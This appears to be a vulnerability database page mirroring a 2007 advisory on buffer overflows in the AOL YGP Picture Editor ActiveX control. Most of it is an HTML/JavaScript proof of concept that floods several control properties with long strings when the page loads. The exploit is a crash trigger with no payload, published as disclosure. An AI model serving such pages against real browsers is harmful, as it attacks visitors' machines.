Lucene search
K

aolygp-overflows.txt

🗓️ 28 Dec 2007 00:00:00Reported by Elazar BroadType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 23 Views

The AOL YGP Picture Editor Control version 9.5.1.8 suffers from multiple buffer overflows in various properties, making it exploitable through scripting. PoC demonstrates the exploit

Code
`The AOL YGP Picture Editor Control(AIM PicEditor Control) version 9.5.1.8 suffers from multiple exploitable buffer overflows in various properties. This object is marked safe for scripting. I have not tested other versions. PoC as follows:  
  
----------------  
<!--  
written by e.b.  
-->  
<html>  
<head>  
<script language="JavaScript" DEFER>  
function Check() {  
var s = 'A';  
  
while (s.length <= 8175) s = s + 'A';  
  
  
obj.DisplayName = s;  
obj.DisplayName = s;  
obj.FinalSavePath = s;  
obj.ForceSaveTo = s;  
obj.HiddenControls = s;  
obj.InitialEditorScreen = s;  
obj.Locale = s;  
obj.Proxy = s;  
obj.UserAgent = s;  
  
  
}  
</script>  
  
</head>  
<body onload="JavaScript: return Check();">  
<object id="obj" classid="clsid:085891E5-ED86-425F-8522-C10290FA8309">  
</object>  
</body>  
</html>  
----------------  
  
Happy Holidays to all!  
  
Elazar  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Dec 2007 00:00Current
7.4High risk
Vulners AI Score7.4
23